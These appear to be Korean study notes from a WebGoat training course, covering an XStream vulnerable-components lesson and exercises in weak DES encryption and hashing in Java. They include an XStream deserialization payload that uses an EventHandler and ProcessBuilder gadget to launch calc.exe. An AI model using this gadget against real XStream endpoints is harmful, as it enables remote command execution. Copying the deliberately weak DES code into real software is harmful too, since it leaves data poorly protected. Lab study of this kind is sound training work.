#page 136
webgoat A9
상위프로젝트webgot-lessons-parents
하위프로젝트vulnerable-components
경로org.owasp.webgoat.vulnerable_components 패키지까지 이동
XStreamExample(main함수 포함) 클래스작성
<org.owasp.webgoat.vulnerable_components.Contact>
    <id>1</id>
    <firstName>Bruce</firstName>
    <lastName>Mayhew</lastName>
    <email>webgoat@owasp.org</email>
</org.owasp.webgoat.vulnerable_components.Contact>
참고파일:XStreamExample.java

아래코드는 인터페이스로 인해 오류발생
<contact class='Contact’> 
<interface> org.owasp.webgoat.vulnerable_components.Contact </interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>
참고파일:Main.java

#page 140
자바코드로 대칭키 암호알고리즘 간단예제
취약한 대칭키 코드 작성
DES로작성
키의 길이를 표시하여 작성
hash알고리즘 생성
참고파일:Test.java

자바에서 해쉬코드 생성하는 간단한 코드 작성
https://crackstation.net
참고파일:HashCheckExample.java







